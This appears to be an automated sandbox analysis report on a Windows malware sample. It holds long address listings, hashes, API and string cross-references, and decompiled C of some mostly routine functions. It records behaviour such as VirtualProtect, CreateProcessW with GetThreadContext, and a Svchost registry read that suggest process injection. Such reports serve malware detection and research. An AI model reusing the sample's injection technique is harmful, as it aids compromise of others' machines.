0x00d41e4b
0x00d41e52
0x00d41e59
0x00d41e60
0x00d41e67
0x00d41e6e
0x00d41e75
0x00d41e7c
0x00d41e83
0x00d41e8a
0x00d41e91
0x00d41e98
0x00d41e9f
0x00d41ea6
0x00d41ead
0x00d41eb4
0x00d41ebb
0x00d41ec2
0x00d41ec9
0x00d41ed0
0x00d41ed7
0x00d41ede
0x00d41ee5
0x00d41eec
0x00d41ef3
0x00d41efa
0x00d41f01
0x00d41f08
0x00d41f0f
0x00d41f16
0x00d41f1d
0x00d41f24
0x00d41f2b
0x00d41f32
0x00d41f39
0x00d41f40
0x00d41f47
0x00d41f4e
0x00d41f55
0x00d41f5c
0x00d41f63
0x00d41f6a
0x00d41f71
0x00d41f78
0x00d41f7f
0x00d41f86
0x00d41f8d
0x00d41f94
0x00d41f9b
0x00d41fa2
0x00d41fa9
0x00d41fb0
0x00d41fb7
0x00d41fbe
0x00d41fc5
0x00d41fcc
0x00d41fd3
0x00d41fda
0x00d41fe1
0x00d41fe8
0x00d41fef
0x00d41ff6
0x00d41ffd
0x00d42004
0x00d4200b
0x00d42012
0x00d42019
0x00d42020
0x00d42027
0x00d4202e
0x00d42035
0x00d4203c
0x00d42043
0x00d4204a
0x00d42051
0x00d42058
0x00d4205f
0x00d42066
0x00d4206d
0x00d42074
0x00d4207b
0x00d42082
0x00d42089
0x00d42090
0x00d42097
0x00d4209e
0x00d420a5
0x00d420ac
0x00d420b3
0x00d420ba
0x00d420c1
0x00d420c8
0x00d420cf
0x00d420d6
0x00d420dd
0x00d420e4
0x00d420eb
0x00d420f2
0x00d420f9
0x00d42100
0x00d42107
0x00d4210e
0x00d42115
0x00d4211c
0x00d42123
0x00d4212a
0x00d42131
0x00d42138
0x00d4213f
0x00d42146
0x00d4214d
0x00d42154
0x00d4215b
0x00d42162
0x00d42169
0x00d42170
0x00d42177
0x00d4217e
0x00d42185
0x00d4218c
0x00d42193
0x00d4219a
0x00d421a1
0x00d421a8
0x00d421af
0x00d421b6
0x00d421bd
0x00d421c4
0x00d421cb
0x00d421d2
0x00d421d9
0x00d421e0
0x00d421e7
0x00d421ee
0x00d421f5
0x00d421fc
0x00d42203
0x00d4220a
0x00d42211
0x00d42218
0x00d4221f
0x00d42226
0x00d4222d
0x00d42234
0x00d4223b
0x00d42242
0x00d42249
0x00d42250
0x00d42257
0x00d4225e
0x00d42265
0x00d4226c
0x00d42273
0x00d4227a
0x00d42281
0x00d42288
0x00d4228f
0x00d42296
0x00d4229d
0x00d422a4
0x00d422ab
0x00d422b2
0x00d422b9
0x00d422c0
0x00d422c7
0x00d422ce
0x00d422d5
0x00d422dc
0x00d422e3
0x00d422ea
0x00d422f1
0x00d422f8
0x00d422ff
0x00d42306
0x00d4230d
0x00d42314
0x00d4231b
0x00d42322
0x00d42329
0x00d42330
0x00d42337
0x00d4233e
0x00d42345
0x00d4234c
0x00d42353
0x00d4235a
0x00d42361
0x00d42368
0x00d4236f
0x00d42376
0x00d4237d
0x00d42384
0x00d4238b
0x00d42392
0x00d42399
0x00d423a0
0x00d423a7
0x00d423ae
0x00d423b5
0x00d423bc
0x00d423c3
0x00d423ca
0x00d423d1
0x00d423d8
0x00d423df
0x00d423e6
0x00d423ed
0x00d423f4
0x00d423fb
0x00d42402
0x00d42409
0x00d4240d
0x00d42411
0x00d42415
0x00d42419
0x00d4241d
0x00d42421
0x00d42425
0x00d42429
0x00d4242d
0x00d42431
0x00d42435
0x00d42439
0x00d4243d
0x00d42441
0x00d42445
0x00d42449
0x00d4244d
0x00d42451
0x00d42455
0x00d42459
0x00d4245d
0x00d42461
0x00d42465
0x00d42469
0x00d4246d
0x00d42471
0x00d42475
0x00d42479
0x00d4247d
0x00d42481
0x00d42485
0x00d42489
0x00d4248d
0x00d42491
0x00d42495
0x00d42499
0x00d4249d
0x00d424a1
0x00d424a5
0x00d424a9
0x00d424ad
0x00d424b1
0x00d424b5
0x00d424b9
0x00d424bd
0x00d424c1
0x00d424c5
0x00d424c9
0x00d424cd
0x00d424d1
0x00d424d5
0x00d424d9
0x00d424dd
0x00d424e1
0x00d424e5
0x00d424e9
0x00d424ed
0x00d424f1
0x00d424f5
0x00d424f9
0x00d424fd
0x00d42501
0x00d42505
0x00d42509
0x00d4250d
0x00d42511
0x00d42515
0x00d42519
0x00d4251d
0x00d42521
0x00d42525
0x00d42529
0x00d4252d
0x00d42531
0x00d42535
0x00d42539
0x00d4253d
0x00d42541
0x00d42545
0x00d42549
0x00d4254d
0x00d42551
0x00d42555
0x00d42559
0x00d4255d
0x00d42561
0x00d42565
0x00d42569
0x00d4256d
0x00d42571
0x00d42575
0x00d42579
0x00d4257d
0x00d42581
0x00d42585
0x00d42589
0x00d4258d
0x00d42591
0x00d42595
0x00d42599
0x00d4259d
0x00d425a1
0x00d425b1
0x00d425b7
0x00d425bb
0x00d425bf
0x00d425c3
0x00d425c7
0x00d425cb
0x00d425d5
0x00d425df
0x00d425e7
0x00d425f4
0x00d42600
0x00d4260d
0x00d4261a
0x00d42625
0x00d4262b
0x00d4263d
0x00d42666
0x00d4263a
0x00d4263a
0x00d42688
0x00d4272b
0x00d42754
0x00d42762
0x00d42768
0x00d4277a
0x00d42799
0x00d427ba
0x00d427c3
0x00d427da
0x00d42777
0x00000000
0x00d42777
0x00000000
0x00d427dc
0x00000000
0x00d427e2
0x00000000
0x00d427e2
0x00d42799
0x00000000
0x00d42702
0x00d4270b
0x00000000
0x00d4270b
0x00d42688

APIs

VirtualProtect.KERNELBASE(000000E9,00000256,00000040,?), ref: 00D4272B
GetDC.USER32(00000000), ref: 00D4274D
GrayStringA.USER32(00000000), ref: 00D42754
MessageBoxW.USER32(00000000,00000000,00000000,00000000), ref: 00D42762
lstrcmpiW.KERNEL32(?,00D52198), ref: 00D42791
lstrcmpiW.KERNEL32(?,00D521A0), ref: 00D427AA

Part of subcall function 00D415A0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00020019,00000000), ref: 00D415C9

Strings

U, xrefs: 00D41D56
\, xrefs: 00D42345
h, xrefs: 00D41E7C
*, xrefs: 00D422A4
*, xrefs: 00D423FB
y, xrefs: 00D42066
3, xrefs: 00D41C06
Y, xrefs: 00D41CA7
1, xrefs: 00D41AA8
f, xrefs: 00D41D80
h, xrefs: 00D41E2F
u, xrefs: 00D42549
*, xrefs: 00D42288
M, xrefs: 00D41927
3, xrefs: 00D4223B
T, xrefs: 00D418E1
;, xrefs: 00D425B7
M, xrefs: 00D42539
t, xrefs: 00D4252D
E, xrefs: 00D41D1E
V, xrefs: 00D41E9F
E, xrefs: 00D419BA
^, xrefs: 00D41C7D
f, xrefs: 00D41D64
h, xrefs: 00D42491
h, xrefs: 00D420DD
W, xrefs: 00D4218C
h, xrefs: 00D42169
^, xrefs: 00D42585
., xrefs: 00D41E98
a, xrefs: 00D42177
u, xrefs: 00D41798
], xrefs: 00D41C22
M, xrefs: 00D41BA4
u, xrefs: 00D4257D
j, xrefs: 00D41F55
Y, xrefs: 00D41B11
O, xrefs: 00D41C76
h, xrefs: 00D421D2
B, xrefs: 00D4246D
M, xrefs: 00D419A5
2, xrefs: 00D422B2
W, xrefs: 00D42123
E, xrefs: 00D41AB6
], xrefs: 00D42589
0, xrefs: 00D41F71
W, xrefs: 00D424C1
_, xrefs: 00D424F1
U, xrefs: 00D41CE6
2, xrefs: 00D42257
E, xrefs: 00D41A69
F, xrefs: 00D41736
x, xrefs: 00D418EF
-, xrefs: 00D425BB
V, xrefs: 00D41EFA
U, xrefs: 00D418CC
h, xrefs: 00D42100
e, xrefs: 00D417F3
H, xrefs: 00D41990
j, xrefs: 00D41C84
f, xrefs: 00D41D2C
s, xrefs: 00D41AA1
E, xrefs: 00D41A38
S, xrefs: 00D41C5A
u, xrefs: 00D41CCA
j, xrefs: 00D41886
a, xrefs: 00D42499
V, xrefs: 00D41E52
M, xrefs: 00D41B73
E, xrefs: 00D41839
E, xrefs: 00D4180F
E, xrefs: 00D41B5E
j, xrefs: 00D41C6F
j, xrefs: 00D41C99
M, xrefs: 00D419CF
W, xrefs: 00D416F0
f, xrefs: 00D41D10
], xrefs: 00D42505
@, xrefs: 00D41E13
E, xrefs: 00D41FFD
], xrefs: 00D421B6
M, xrefs: 00D419F9
U, xrefs: 00D41C30
k, xrefs: 00D4189B
A, xrefs: 00D4261A
K, xrefs: 00D423CA
^, xrefs: 00D424F5
W, xrefs: 00D41C68
|, xrefs: 00D41E4B
M, xrefs: 00D418B7
^, xrefs: 00D417AD
@, xrefs: 00D41A46
2, xrefs: 00D4235A
E, xrefs: 00D41FCC
W, xrefs: 00D424D9
[, xrefs: 00D424F9
s, xrefs: 00D425C7
P, xrefs: 00D424BD
f, xrefs: 00D41CF4
d, xrefs: 00D41D9C
V, xrefs: 00D416B1
e, xrefs: 00D41A0E
y, xrefs: 00D41F94
A, xrefs: 00D4256D
X, xrefs: 00D41CA0
t, xrefs: 00D41EE5
H, xrefs: 00D41863
@, xrefs: 00D420D6
2, xrefs: 00D42411
U, xrefs: 00D41BB9
r, xrefs: 00D42489
P, xrefs: 00D4202E
M, xrefs: 00D41951
H, xrefs: 00D41A93
j, xrefs: 00D42138
u, xrefs: 00D41B49
*, xrefs: 00D4244D
2, xrefs: 00D42469
h, xrefs: 00D41F63
Z, xrefs: 00D41C92
V, xrefs: 00D41C61
<, xrefs: 00D4186A
U, xrefs: 00D4250D
f, xrefs: 00D41CBC
M, xrefs: 00D41D72
M, xrefs: 00D4184E
u, xrefs: 00D42089
?, xrefs: 00D4245D
R, xrefs: 00D41B03
f, xrefs: 00D41D48
j, xrefs: 00D41FA9
U, xrefs: 00D4251D
M, xrefs: 00D41878
M, xrefs: 00D41D02
@, xrefs: 00D41DE2
U, xrefs: 00D417C2
+, xrefs: 00D42551
j, xrefs: 00D42012
Y, xrefs: 00D41B2D
h, xrefs: 00D41F86
H, xrefs: 00D4193C
U, xrefs: 00D41AE0
u, xrefs: 00D416BF
h, xrefs: 00D42146
H, xrefs: 00D419E4
4, xrefs: 00D4227A
u, xrefs: 00D41D3A
M, xrefs: 00D41ACB
f, xrefs: 00D41CD8
E, xrefs: 00D41912
P, xrefs: 00D4207B
Z, xrefs: 00D41C8B
, xrefs: 00D41943
P, xrefs: 00D4200B
2, xrefs: 00D42296
E, xrefs: 00D41966
E, xrefs: 00D41824
3, xrefs: 00D41CAE
A, xrefs: 00D41B96
h, xrefs: 00D42058
_, xrefs: 00D417A6
0, xrefs: 00D420EB
0, xrefs: 00D41DAA
;, xrefs: 00D41A8C
M, xrefs: 00D41A7E
@, xrefs: 00D41DCD
>, xrefs: 00D41775
j, xrefs: 00D420CF
U, xrefs: 00D423DF
V, xrefs: 00D421FC
M, xrefs: 00D4197B
E, xrefs: 00D41B3B
$, xrefs: 00D419EB
], xrefs: 00D417B4
W, xrefs: 00D42043
h, xrefs: 00D41ED7
E, xrefs: 00D41A54
r, xrefs: 00D425C3
P, xrefs: 00D41FEF
X, xrefs: 00D41894
E, xrefs: 00D41D8E
U, xrefs: 00D418FD
U, xrefs: 00D4169C
3, xrefs: 00D42035
E, xrefs: 00D41FE1
V, xrefs: 00D42541
0, xrefs: 00D42154
S, xrefs: 00D421F5
;, xrefs: 00D41B34

Memory Dump Source

Source File: 00000000.00000002.353025980.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.353021820.0000000000D40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353036235.0000000000D4D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353042879.0000000000D52000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353052329.0000000000D55000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353063498.0000000000D56000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcmpi$GrayMessageOpenProtectStringVirtual
String ID: $$$*$*$*$*$+$-$.$0$0$0$0$1$2$2$2$2$2$2$3$3$3$3$4$;$;$;$<$>$?$@$@$@$@$@$A$A$A$B$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$F$H$H$H$H$H$K$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$M$O$P$P$P$P$P$R$S$S$T$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$W$W$W$W$W$W$W$X$X$Y$Y$Y$Z$Z$[$\$]$]$]$]$]$^$^$^$^$_$_$a$a$d$e$e$f$f$f$f$f$f$f$f$h$h$h$h$h$h$h$h$h$h$h$h$j$j$j$j$j$j$j$j$j$k$r$r$s$s$t$t$u$u$u$u$u$u$u$u$x$y$y$|
API String ID: 1346567926-1920957551
Opcode ID: 631b9ea1f19bfeaf3cb884fd2d4571c71db0d0a47a6a04c280f046633780087a
Instruction ID: ee7a4a778b0c05a7f5bba8963278f5edee9622bdd79f2574e3597b5d07a20461
Opcode Fuzzy Hash: 631b9ea1f19bfeaf3cb884fd2d4571c71db0d0a47a6a04c280f046633780087a
Instruction Fuzzy Hash: FEC2892090CBE9C9DB32C27C8C587DDAE611B27325F5843D9D1F82A2D2C7B50B85DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00A90FAE, Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 591processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00A913AC
GetThreadContext.KERNELBASE(?,00010007), ref: 00A913CF

Strings

D, xrefs: 00A91210

Memory Dump Source

Source File: 00000000.00000002.352955029.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false

Similarity

API ID: ContextCreateProcessThread
String ID: D
API String ID: 2843130473-2746444292
Opcode ID: 032d5c970bb7b77655caf26d63fe659adc2bbd60e192c210a0e66bfe77d3138b
Instruction ID: c679120ca111a76c85504e161655ac816983990fb7ae029c541203e92df9f1ca
Opcode Fuzzy Hash: 032d5c970bb7b77655caf26d63fe659adc2bbd60e192c210a0e66bfe77d3138b
Instruction Fuzzy Hash: 7C321435E50259EEEF60CB98DD51BADB7F5AF48700F20449AE608EB2A1D7709E80DF05

Uniqueness

Uniqueness Score: -1.00%

Function 00D46367, Relevance: 4.6, APIs: 3, Instructions: 59
memoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00D46367(intOrPtr __ebx, void* __edx, void* __edi, long _a4) {
				void* __esi;
				void* _t2;
				void* _t6;
				void* _t7;
				void* _t11;
				long _t18;
				void* _t22;
				long _t25;

				_t23 = __edi;
				_t22 = __edx;
				_t14 = __ebx;
				_t25 = _a4;
				if(_t25 > 0xffffffe0) {
					E00D45380(_t2, _t25);
					 *((intOrPtr*)(E00D45086(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				_push(__ebx);
				_push(__edi);
				while(1) {
					_t6 =  *0xd5329c; // 0xf90000
					_t27 = _t6;
					if(_t6 == 0) {
						E00D437B6(_t14, _t22, _t23, _t25, _t27);
						E00D43813(_t14, _t22, _t23, _t25, 0x1e);
						E00D42F01(0xff);
						_t6 =  *0xd5329c; // 0xf90000
					}
					if(_t25 == 0) {
						_t18 = 1;
						__eflags = 1;
					} else {
						_t18 = _t25;
					}
					_t7 = RtlAllocateHeap(_t6, 0, _t18); // executed
					_t23 = _t7;
					if(_t23 != 0) {
						break;
					}
					_t14 = 0xc;
					if( *0xd540d0 == _t7) {
						 *((intOrPtr*)(E00D45086(__eflags))) = _t14;
						L12:
						 *((intOrPtr*)(E00D45086(_t31))) = _t14;
						break;
					}
					_t11 = E00D45380(_t7, _t25);
					_t31 = _t11;
					if(_t11 != 0) {
						continue;
					}
					goto L12;
				}
				return _t23;
			}

0x00d46367
0x00d46367
0x00d46367
0x00d4636b
0x00d46371
0x00d463e3
0x00d463ee
0x00d463f4
0x00000000
0x00d463f4
0x00d46373
0x00d46374
0x00d46375
0x00d46375
0x00d4637a
0x00d4637c
0x00d4637e
0x00d46385
0x00d4638f
0x00d46394
0x00d4639a
0x00d4639d
0x00d463a5
0x00d463a5
0x00d4639f
0x00d4639f
0x00d4639f
0x00d463aa
0x00d463b0
0x00d463b4
0x00000000
0x00000000
0x00d463b8
0x00d463bf
0x00d463d3
0x00d463d5
0x00d463da
0x00000000
0x00d463da
0x00d463c2
0x00d463c8
0x00d463ca
0x00000000
0x00000000
0x00000000
0x00d463cc
0x00000000

APIs

__FF_MSGBANNER.LIBCMT ref: 00D4637E

Part of subcall function 00D437B6: __NMSG_WRITE.LIBCMT ref: 00D437DD
Part of subcall function 00D437B6: __NMSG_WRITE.LIBCMT ref: 00D437E7

__NMSG_WRITE.LIBCMT ref: 00D46385

Part of subcall function 00D43813: GetModuleFileNameW.KERNEL32(00000000,00D535EA,00000104,00000000,00000000,00000000), ref: 00D438A5
Part of subcall function 00D43813: ___crtMessageBoxW.LIBCMT ref: 00D43953

Part of subcall function 00D42F01: ExitProcess.KERNEL32 ref: 00D42F10

Part of subcall function 00D45086: __getptd_noexit.LIBCMT ref: 00D45086

RtlAllocateHeap.NTDLL(00F90000,00000000,00000001,00000000,00000000,00000000,?,00D4436D,00000000,00000000,00000000,00000000,?,00D44222,00000018,00D511B8), ref: 00D463AA

Memory Dump Source

Source File: 00000000.00000002.353025980.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.353021820.0000000000D40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353036235.0000000000D4D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353042879.0000000000D52000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353052329.0000000000D55000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353063498.0000000000D56000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateExitFileHeapMessageModuleNameProcess___crt__getptd_noexit
String ID:
API String ID: 3823847927-0
Opcode ID: ea6c2789d822b59576f6e1958c05830b25af50b81981a0f5e1d2f2940ab8a763
Instruction ID: 5e1711320665446b604e690c6771fe0ff58a281e820051efaa0872a745adea74
Opcode Fuzzy Hash: ea6c2789d822b59576f6e1958c05830b25af50b81981a0f5e1d2f2940ab8a763
Instruction Fuzzy Hash: B501F5362007519FE6143F78AC4AB2A7358DF437A1F190129F982DB2C2DFB1DC0082B6

Uniqueness

Uniqueness Score: -1.00%

Function 00A90AB5, Relevance: 1.6, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(00000000,00036200,00036200,00036200), ref: 00A90BE0

Memory Dump Source

Source File: 00000000.00000002.352955029.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: a973818a31a37917d188bbf9a0c29b5ef56d864620f117b6d28dafcce5abff8f
Instruction ID: bc34eb0402042722d1d6bf2579db33e3b44553ac1dfc9378d9e971568c804dc0
Opcode Fuzzy Hash: a973818a31a37917d188bbf9a0c29b5ef56d864620f117b6d28dafcce5abff8f
Instruction Fuzzy Hash: 6C41C715A54348EDDB60DBE8F952BBDB7B1AF48B50F205407F908EE2E0E3710A91D74A

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00D41450, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00D41450(WCHAR* _a4) {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				int _v20;
				long _t65;

				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = _a4;
				while(( *_v8 & 0x0000ffff) != 0) {
					_v12 = _v12 + 1;
					_v8 =  &(_v8[lstrlenW(_v8)]);
					_v8 =  &(_v8[1]);
				}
				_v16 = HeapAlloc(GetProcessHeap(), 0, 8 + _v12 * 8);
				_v12 = 0;
				_v8 = _a4;
				while(( *_v8 & 0x0000ffff) != 0) {
					if(E00D41160(_v8, _v16 + _v12 * 8) != 0) {
						_v12 = _v12 + 1;
						_v8 =  &(_v8[lstrlenW(_v8)]);
						_v8 =  &(_v8[1]);
						continue;
					}
					HeapFree(GetProcessHeap(), 0, _v16);
					return 0;
				}
				 *(_v16 + _v12 * 8) = 0;
				 *(_v16 + 4 + _v12 * 8) = 0;
				_v20 = StartServiceCtrlDispatcherW(_v16);
				if(_v20 == 0) {
					_t65 = GetLastError();
					0xd40000(_a4, _t65);
					0xd40000("StartServiceCtrlDispatcherW failed to start %s: %u\n", _t65);
				}
				HeapFree(GetProcessHeap(), 0, _v16);
				return _v20;
			}

0x00d41456
0x00d4145d
0x00d41464
0x00d4146e
0x00d41471
0x00d41481
0x00d41494
0x00d4149d
0x00d4149d
0x00d414bc
0x00d414bf
0x00d414c9
0x00d414cc
0x00d414eb
0x00d4150d
0x00d41520
0x00d41529
0x00000000
0x00d41529
0x00d414fa
0x00000000
0x00d41500
0x00d41534
0x00d41541
0x00d41553
0x00d4155a
0x00d4155c
0x00d41567
0x00d41572
0x00d41572
0x00d41584
0x00000000

APIs

lstrlenW.KERNEL32(00000000), ref: 00D41488
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D414AF
HeapAlloc.KERNEL32(00000000), ref: 00D414B6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D414F3
HeapFree.KERNEL32(00000000), ref: 00D414FA
lstrlenW.KERNEL32(00000000), ref: 00D41514
StartServiceCtrlDispatcherW.ADVAPI32(00000000), ref: 00D4154D
GetLastError.KERNEL32 ref: 00D4155C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D4157D
HeapFree.KERNEL32(00000000), ref: 00D41584

Strings

StartServiceCtrlDispatcherW failed to start %s: %u, xrefs: 00D4156D

Memory Dump Source

Source File: 00000000.00000002.353025980.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.353021820.0000000000D40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353036235.0000000000D4D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353042879.0000000000D52000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353052329.0000000000D55000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353063498.0000000000D56000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$Freelstrlen$AllocCtrlDispatcherErrorLastServiceStart
String ID: StartServiceCtrlDispatcherW failed to start %s: %u
API String ID: 3118973391-2801566792
Opcode ID: dc45cbc83a97f26963a0a39d5478d690370951ac691998854d66a505e5a6acd6
Instruction ID: 7727b906f0cb3dead9ddb2b7e730ebf1a8c4dbf1b9692499c43f1f5a598b048e
Opcode Fuzzy Hash: dc45cbc83a97f26963a0a39d5478d690370951ac691998854d66a505e5a6acd6
Instruction Fuzzy Hash: EB41F7B8E00209EFDB10DFA4C944BAEBBB5FF48305F208199E945AB340D7319A41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D410B0, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 60
memoryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00D410B0(WCHAR* _a4) {
				long _v8;
				void* _v12;
				long _t25;
				long _t30;

				_v8 = 0;
				_v8 = ExpandEnvironmentStringsW(_a4, 0, _v8);
				if(_v8 != 0) {
					_t19 = _v8;
					_t9 = _t19 + 2; // 0x2
					_v12 = HeapAlloc(GetProcessHeap(), 0, _v8 + _t9);
					if(ExpandEnvironmentStringsW(_a4, _v12, _v8) != 0) {
						return _v12;
					}
					_t25 = GetLastError();
					0xd40000(_a4, _t25);
					0xd40000("cannot expand env vars in %s: %u\n", _t25);
					HeapFree(GetProcessHeap(), 0, _v12);
					return 0;
				}
				_t30 = GetLastError();
				0xd40000(_a4, _t30);
				0xd40000("cannot expand env vars in %s: %u\n", _t30);
				return 0;
			}

0x00d410b6
0x00d410cd
0x00d410d4
0x00d410f5
0x00d410f8
0x00d4110c
0x00d41123
0x00000000
0x00d41157
0x00d41125
0x00d41130
0x00d4113b
0x00d4114d
0x00000000
0x00d41153
0x00d410d6
0x00d410e1
0x00d410ec
0x00000000

APIs

ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000), ref: 00D410C7
GetLastError.KERNEL32 ref: 00D410D6
GetProcessHeap.KERNEL32(00000000,00000002), ref: 00D410FF
HeapAlloc.KERNEL32(00000000), ref: 00D41106
ExpandEnvironmentStringsW.KERNEL32(?,?,00000000), ref: 00D4111B
GetLastError.KERNEL32 ref: 00D41125
GetProcessHeap.KERNEL32(00000000,?), ref: 00D41146
HeapFree.KERNEL32(00000000), ref: 00D4114D

Strings

cannot expand env vars in %s: %u, xrefs: 00D41136
cannot expand env vars in %s: %u, xrefs: 00D410E7

Memory Dump Source

Source File: 00000000.00000002.353025980.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.353021820.0000000000D40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353036235.0000000000D4D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353042879.0000000000D52000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353052329.0000000000D55000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353063498.0000000000D56000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$EnvironmentErrorExpandLastProcessStrings$AllocFree
String ID: cannot expand env vars in %s: %u$cannot expand env vars in %s: %u
API String ID: 3773870257-3849838887
Opcode ID: f1a01fd0a317fa0ef7b4825dffa6c2bc3b3a02c103241cddb8141b332e527766
Instruction ID: 4d79221cbf2eaa24ec46e5c50a0a1bc2f23cdc77fb8b81cd53758697e8b2acb0
Opcode Fuzzy Hash: f1a01fd0a317fa0ef7b4825dffa6c2bc3b3a02c103241cddb8141b332e527766
Instruction Fuzzy Hash: 5411E9B9604208BFDB50EFE4DC49FAE7BB9EB09302F108448FA09D7350DA309A459B71

Uniqueness

Uniqueness Score: -1.00%

Function 00D44142, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D44142(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}

0x00d44147
0x00d44157

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00D44FB8,?,?,?,00000000), ref: 00D44147
UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 00D44150

Memory Dump Source

Source File: 00000000.00000002.353025980.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.353021820.0000000000D40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353036235.0000000000D4D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353042879.0000000000D52000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353052329.0000000000D55000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353063498.0000000000D56000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: af09fb9f84feb41ced3876419a0fa3ef4a5e38816bb8c18331ab5313f644bd7b
Instruction ID: 6c91f1b8ad147a6f58b2a9dad5fb66455b7ab6bd2080fbad85e1d4d11fd62550
Opcode Fuzzy Hash: af09fb9f84feb41ced3876419a0fa3ef4a5e38816bb8c18331ab5313f644bd7b
Instruction Fuzzy Hash: 21B09239144308ABCB012F91EC0AB587F2AEB0A652F004010FA0D84661CB7254108AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00D44111, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D44111(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}

0x00d4411e

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,00D42A6C,00D42A21), ref: 00D44117

Memory Dump Source

Source File: 00000000.00000002.353025980.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.353021820.0000000000D40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353036235.0000000000D4D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.353042879.0000000000D52000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353052329.0000000000D55000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.353063498.0000000000D56000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 062a82755cdfe97fa932912a2e003bbbace7cac3750448b1946b6d28ef70fa05
Instruction ID: 7ff8c4f87fc84af35db8521e8209e1d9e2d65e7a0134feeadc4fa425cf5c9a58
Opcode Fuzzy Hash: 062a82755cdfe97fa932912a2e003bbbace7cac3750448b1946b6d28ef70fa05
Instruction Fuzzy Hash: D8A0113000030CAB8B002F82EC0A8883F2EEB0A2A0B000020F80C80220CB22A8208AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A908EE, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.352955029.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction ID: 0dfcef2da41407ec2ef6ff8c767e870ffbf8336ecba494b2c7b2241c452ca173
Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
Instruction Fuzzy Hash: 8311A036B04119EFDF20DBAAD888CAEF7FDEF44794B5440A6E805D3212E7709E41D660

Uniqueness

Uniqueness Score: -1.00%

Function 00A909DE, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

